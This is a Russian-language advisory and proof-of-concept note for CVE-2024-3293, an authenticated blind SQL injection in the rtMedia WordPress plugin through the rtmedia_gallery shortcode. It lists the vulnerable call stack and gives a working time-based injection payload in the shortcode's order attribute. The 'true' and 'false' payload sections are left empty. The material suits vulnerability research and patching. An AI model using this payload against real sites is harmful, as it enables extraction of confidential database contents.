
CVE-2024-3293 rtMedia для WordPress, BuddyPress и bbPress <= 4.6.18 — аутентифицированная (Contributor+) SQL-инъекция через шорткод rtmedia_gallery
rtMedia для WordPress, BuddyPress и bbPress <= 4.6.18 - Аутентифицированная (Contributor+) SQL-инъекция через шорткод rtmedia_gallery
Описание
Плагин rtMedia для WordPress, BuddyPress и bbPress уязвим к слепой SQL-инъекции через шорткод rtmedia_gallery во всех версиях до 4.6.18 включительно из-за недостаточного экранирования пользовательского параметра и отсутствия достаточной подготовки существующего SQL-запроса. Это позволяет аутентифицированным злоумышленникам с уровнем доступа Contributor и выше добавлять дополнительные SQL-запросы в уже существующие запросы, которые можно использовать для извлечения конфиденциальной информации из базы данных.
СТЕК ВЫЗОВОВ
RTMediaModel->get (\buddypress-media\app\helper\RTMediaModel.php:61)
RTMediaModel->get_media (\buddypress-media\app\helper\RTMediaModel.php:227)
RTMediaQuery->populate_media (\buddypress-media\app\main\routers\query\RTMediaQuery.php:869)
RTMediaQuery->populate_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:993)
RTMediaQuery->get_data (\buddypress-media\app\main\routers\query\RTMediaQuery.php:1214)
RTMediaQuery->query (\buddypress-media\app\main\routers\query\RTMediaQuery.php:684)
RTMediaQuery->__construct (\buddypress-media\app\main\routers\query\RTMediaQuery.php:184)
RTMediaGalleryShortcode::render (\buddypress-media\app\main\controllers\shortcodes\RTMediaGalleryShortcode.php:271)
Полезная нагрузка:
[rtmedia_gallery global="true" album_id="57" order_by="ratings" order=",media_id,(select 1 from (select sleep(IF(1=1,5,0)))x)"]


Полезная нагрузка true:

Полезная нагрузка false:
